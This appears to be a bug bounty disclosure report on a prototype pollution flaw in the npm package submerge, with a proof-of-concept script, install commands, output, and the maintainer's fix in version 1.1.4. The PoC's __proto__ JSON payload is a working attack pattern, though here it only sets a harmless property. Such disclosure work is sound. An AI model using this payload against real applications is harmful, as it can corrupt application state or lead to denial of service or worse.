Prototype pollution in konfirm/node-submerge

Valid

Reported on

Aug 21st 2022


Description

submerge is vulnerable to Prototype Pollution. The package does not restrict access to object prototypes while merging, so a `__proto__` key in attacker-controlled input is followed into `Object.prototype` and its properties are modified for every object in the process, which may result in Sensitive Information Disclosure, Denial of Service (DoS) or Remote Code Execution.

Proof of Concept

Create the following PoC file:

// poc.js
var merge = require("submerge");
let obj = {};
// JSON.parse creates "__proto__" as an own key, which the merge then walks into
let payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
console.log("Before : " + {}.polluted); // property is absent on a fresh object
merge(obj, payload);
console.log("After : " + {}.polluted);  // now present on every object via Object.prototype

Execute the following commands in another terminal:

npm i submerge  # Install affected module
node poc.js # Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

Impact

May result in Sensitive Information Disclosure, Denial of Service (DoS) or Remote Code Execution.

We are processing your report and will contact the konfirm/node-submerge team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the konfirm/node-submerge team and are waiting to hear back a year ago
konfirm/node-submerge maintainer gave praise a year ago
Thank you for bringing this issue to my attention. I have used the proof of concept code as the basis for a test scenario, was able to reproduce your finding and then resolve the issue.
konfirm/node-submerge maintainer validated this vulnerability a year ago
waelahmed-dev has been awarded the disclosure bounty
The fix bounty is now up for grabs
konfirm/node-submerge maintainer marked this as fixed in 1.1.4 with commit c2d67f a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
waelahmed-dev (Researcher), a year ago
I'm glad that I could help in making your repo more secure. Isn't there any bounty for this report? Or at least a CVE? Of course, if it's possible for you, I would be really grateful.